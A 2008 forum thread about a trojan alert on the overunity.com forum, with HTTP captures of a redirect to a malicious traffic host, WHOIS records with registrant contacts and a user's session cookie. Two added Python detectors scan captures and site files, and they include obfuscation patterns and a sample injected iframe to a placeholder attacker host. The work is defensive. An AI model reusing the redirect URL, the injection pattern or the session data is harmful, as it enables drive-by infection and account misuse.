

Trojan Alert

Started by Ergo, January 07, 2008, 10:25:09 AM


starcruiser

More info on this malware gang; these are Russian hackers.

http://ddanchev.blogspot.com/2007/11/new-media-malware-gang.html

I was looking: is this your domain or the hoster?

http://www.w3.org/1999/xhtml
Regards,

Carl

turbo

It still connects to the site, but the alert is gone.

http://www.overunity.com/index.php

GET /index.php HTTP/1.1
Host: www.overunity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.overunity.com/index.php?action=forum
Cookie: SMFCookie11=a%3A4%3A%7Bi%3A0%3Bs%3A4%3A%223834%22%3Bi%3A1%3Bs%3A40%3A%226ce775d84aada0cb081928ac878a4e2fbdb4104f%22%3Bi%3A2%3Bi%3A1374524675%3Bi%3A3%3Bi%3A0%3B%7D; __utma=140742380.1068190726.1198593065.1198932286.1198956070.6; __utmz=140742380.1194179925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=94f7b935b23a9dfc8e1b044760bbd93c
If-Modified-Since: Fri, 11 Jan 2008 18:52:03 GMT

HTTP/1.x 200 OK
Date: Fri, 11 Jan 2008 18:52:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.3
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Fri, 11 Jan 2008 18:52:26 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4081
Keep-Alive: timeout=10
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
----------------------------------------------------------
h ttp://orentraff.cn/tdsslam/index.php?out=1193100109

GET /tdsslam/index.php?out=1193100109 HTTP/1.1
Host: orentraff.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.overunity.com/index.php

HTTP/1.x 200 OK
Date: Fri, 11 Jan 2008 18:52:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html

----------------------------------------------------------
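The two exchanges above show the pattern a defender looks for in a proxy or browser capture: a request to a host that is not the site's own, carrying a Referer from a page on the site. The script below is an added example, not code from the thread or from SMF; it parses a header-only capture (a constructed sample modelled on the two requests above, with only the headers the check needs) and reports every request to a third-party host that was referred by one of the site's own pages. The domain list `own_domains` is an assumption the caller supplies.

```python
import re
from urllib.parse import urlparse

# Constructed sample capture, modelled on the two exchanges posted above.
# Only the request line, Host and Referer matter for this check.
SAMPLE_CAPTURE = """\
GET /index.php HTTP/1.1
Host: www.overunity.com
Referer: http://www.overunity.com/index.php?action=forum

HTTP/1.x 200 OK
Content-Type: text/html; charset=ISO-8859-1

GET /tdsslam/index.php?out=1193100109 HTTP/1.1
Host: orentraff.cn
Referer: http://www.overunity.com/index.php

HTTP/1.x 200 OK
Content-Length: 20
Content-Type: text/html
"""

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD)\s+(\S+)\s+HTTP/\d\.\d$")


def parse_requests(capture):
    """Return (path, headers) for each request block in a header-only capture.

    Blocks are separated by blank lines; response blocks (first line starts
    with HTTP/) are skipped because only requests carry Host and Referer.
    """
    requests = []
    block = []
    for line in capture.splitlines() + [""]:
        if line.strip() == "":
            if block:
                m = REQUEST_LINE.match(block[0])
                if m:
                    headers = {}
                    for h in block[1:]:
                        if ":" in h:
                            k, v = h.split(":", 1)
                            headers[k.strip().lower()] = v.strip()
                    requests.append((m.group(2), headers))
                block = []
        else:
            block.append(line)
    return requests


def is_own_host(host, own_domains):
    """True if host equals or is a subdomain of one of own_domains."""
    host = host.lower().split(":")[0]
    return any(host == d or host.endswith("." + d) for d in own_domains)


def find_third_party_requests(capture, own_domains):
    """Requests to hosts outside own_domains whose Referer is a page on own_domains.

    That combination is what an injected iframe, script or redirect produces
    when a visitor loads the site's own page.
    """
    hits = []
    for path, headers in parse_requests(capture):
        host = headers.get("host", "")
        ref_host = urlparse(headers.get("referer", "")).hostname or ""
        if host and not is_own_host(host, own_domains) and is_own_host(ref_host, own_domains):
            hits.append({"host": host, "path": path, "referer": headers.get("referer", "")})
    return hits


if __name__ == "__main__":
    for hit in find_third_party_requests(SAMPLE_CAPTURE, ["overunity.com"]):
        print(f"third-party fetch from own page: {hit['host']}{hit['path']} (referer {hit['referer']})")
```

Run against a real capture the same way, with every domain the site legitimately serves content from (CDN, image host) added to `own_domains`; whatever remains is the list of hosts to explain.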


turbo

The 88.255.94.14 address is not the orentraff.cn address; this is 203.117.111.102,
so the first address redirected to the second address.
The first seems to be a Turkish company and the second Australian.

-----------------------------------------

Domain Name: orentraff.cn ->> 203.117.111.102
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: N/A
Registrant Name: NizovGrisha
Administrative Email: grishanizov@gmail.com
Sponsoring Registrar: ????????????
Name Server:ns1.all-traff.com
Name Server:ns2.all-traff.com
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14



OrgName:    Asia Pacific Network Information Centre
OrgID:      APNIC
Address:    PO Box 2131
City:       Milton
StateProv:  QLD
PostalCode: 4064
Country:    AU

ReferralServer: whois://whois.apnic.net

NetRange:   202.0.0.0 - 203.255.255.255
CIDR:       202.0.0.0/7
NetName:    APNIC-CIDR-BLK
NetHandle:  NET-202-0-0-0-1
Parent:
NetType:    Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: DNS1.TELSTRA.NET
Comment:    This IP address range is not registered in the ARIN database.
Comment:    For details, refer to the APNIC Whois Database via
Comment:    WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment:    ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:    for the Asia Pacific region. APNIC does not operate networks
Comment:    using this IP address range and is not able to investigate
Comment:    spam or abuse reports relating to these addresses. For more
Comment:    help, refer to http://www.apnic.net/info/faq/abuse
Comment:
RegDate:    1994-04-05
Updated:    2005-05-20

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net

# ARIN WHOIS database, last updated 2008-01-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% [whois.apnic.net node-1]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

inetnum:      203.117.0.0 - 203.117.255.255
netname:      STARHUBINTERNET-SG
descr:        root
country:      SG
admin-c:      NS110-AP
tech-c:       NS110-AP
mnt-by:       MAINT-AS4657-AP
status:       ALLOCATED NON-PORTABLE
changed:      admin_ipdb@starhub.com 20070605
source:       APNIC

person:       NOC SHI
nic-hdl:      NS110-AP
e-mail:       noc@starhub.com
address:      19 TaiSeng Drive
address:      Singapore 535222
phone:        +65 6825 7878
fax-no:       +65 6821 6012
country:      SG
changed:      ipadmin@starhub.com 20060607
mnt-by:       MAINT-AS4657-AP
source:       APNIC

--------------------------------------------------------------

88.255.94.14

OrgName:    RIPE Network Coordination Centre
OrgID:      RIPE
Address:    P.O. Box 10096
City:       Amsterdam
StateProv:
PostalCode: 1001EB
Country:    NL

ReferralServer: whois://whois.ripe.net:43

NetRange:   88.0.0.0 - 88.255.255.255
CIDR:       88.0.0.0/8
NetName:    88-RIPE
NetHandle:  NET-88-0-0-0-1
Parent:
NetType:    Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment:    These addresses have been further assigned to users in
Comment:    the RIPE NCC region. Contact information can be found in
Comment:    the RIPE database at http://www.ripe.net/whois
RegDate:    2004-04-01
Updated:    2004-04-06

# ARIN WHOIS database, last updated 2008-01-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '88.255.94.0 - 88.255.94.255'

inetnum:        88.255.94.0 - 88.255.94.255
netname:        AbdAllah_Internet
descr:          AbdAllah Internet Hizmetleri
descr:          Etnografya Muze mevkii Kirazlik Mh. No:32 Rize
country:        tr
admin-c:        MAG87-RIPE
tech-c:         MAG87-RIPE
status:         assigned pa
mnt-by:         as9121-mnt
source:         RIPE # Filtered

person:         Mahmod AbdAllah el Gashmi
address:        AbdAllah Internet Hizmetleri
e-mail:         ipadmin@ahlen.biz
phone:          +90 543 3767728
remarks:        ------------------------------------------------------
remarks:        Routing and peering issues: ipadmin@ahlen.biz
remarks:        SPAM and Network security issues: abuse@ahlen.biz
remarks:        Customer support: ipadmin@ahlen.biz
remarks:        General information: ipadmin@ahlen.biz
remarks:        ------------------------------------------------------
nic-hdl:        MAG87-RIPE
mnt-by:         sistem-net-mnt
source:         RIPE # Filtered

% Information related to '88.255.0.0/16AS9121'

route:          88.255.0.0/16
descr:          TurkTelekom
origin:         AS9121
mnt-by:         AS9121-MNT
source:         RIPE # Filtered

turbo

I am using Mozilla on my own computer and it works fine.
But I just tried to load the forum page in IE6 and it gave another trojan alert.
So IE6 users beware..

If you look into your msconfig you can switch it off if you are infected.

hartiberlin

Somehow somebody must have inserted an iframe into one file of my forum,
but I have not yet found the file
where it is inserted.
If somebody familiar with the SMF software can help?
The index.php file calls many other PHP files
and I really must find this now..
Stefan Hartmann, Moderator of the overunity.com forum
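The question in the last post, finding which of the many PHP and template files an iframe was inserted into, is a file-tree sweep. The scanner below is an added example and not part of the thread or of SMF; it walks a directory, and for every PHP, HTML, template or JavaScript file reports iframes that point at a host outside the site's own domains, iframes that are hidden (zero size or `display:none`), and the `eval(base64_decode(...))`-style wrappers that injected PHP commonly hides behind. The domain list and the sample files written in the `__main__` block are constructed for the demonstration; `attacker.example` is a placeholder host, not a host from the page.

```python
import os
import re
import tempfile

# Assumption: a forum's own templates do not embed hidden iframes, iframes to
# foreign hosts, or base64-wrapped eval() calls, so each match deserves a look.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?\s*[01]\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)
OBFUSCATION_RE = re.compile(
    r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(|document\.write\s*\(\s*unescape\s*\(",
    re.IGNORECASE,
)


def is_own_host(host, own_domains):
    """True if host equals or is a subdomain of one of own_domains."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in own_domains)


def scan_text(text, own_domains, name="<text>"):
    """Return findings (name, line_no, reason, snippet) for one file's contents."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in IFRAME_RE.finditer(line):
            tag = m.group(0)
            src = SRC_RE.search(tag)
            if src and not is_own_host(src.group(1), own_domains):
                findings.append((name, line_no, "iframe to external host " + src.group(1).lower(), tag[:80]))
            elif HIDDEN_RE.search(tag):
                findings.append((name, line_no, "hidden iframe", tag[:80]))
        if OBFUSCATION_RE.search(line):
            findings.append((name, line_no, "obfuscated eval / document.write", line.strip()[:80]))
    return findings


def scan_tree(root, own_domains, extensions=(".php", ".html", ".tpl", ".js")):
    """Scan every file under root with one of the given extensions."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if fn.lower().endswith(extensions):
                path = os.path.join(dirpath, fn)
                # latin-1 never fails to decode, so binary junk in a file cannot abort the sweep
                with open(path, "r", encoding="latin-1") as f:
                    findings.extend(scan_text(f.read(), own_domains, path))
    return findings


if __name__ == "__main__":
    # Constructed sample tree: one clean template and one with an injected iframe.
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "clean.template.php"), "w") as f:
            f.write('<iframe src="http://www.overunity.com/help.php" width="100%"></iframe>\n')
        with open(os.path.join(root, "index.template.php"), "w") as f:
            f.write('<?php echo "ok"; ?>\n')
            f.write('<iframe src="http://attacker.example/t/index.php" width=0 height=0></iframe>\n')
        for name, line_no, reason, snippet in scan_tree(root, ["overunity.com"]):
            print(f"{name}:{line_no}: {reason}: {snippet}")
```

Point `scan_tree` at the web root and at the SMF `Themes` and `Sources` directories, then compare any flagged file against a clean copy of the same SMF release; an iframe the scanner misses (for example one assembled from string fragments at runtime) will still show up as a third-party request in a browser capture, so the two checks complement each other.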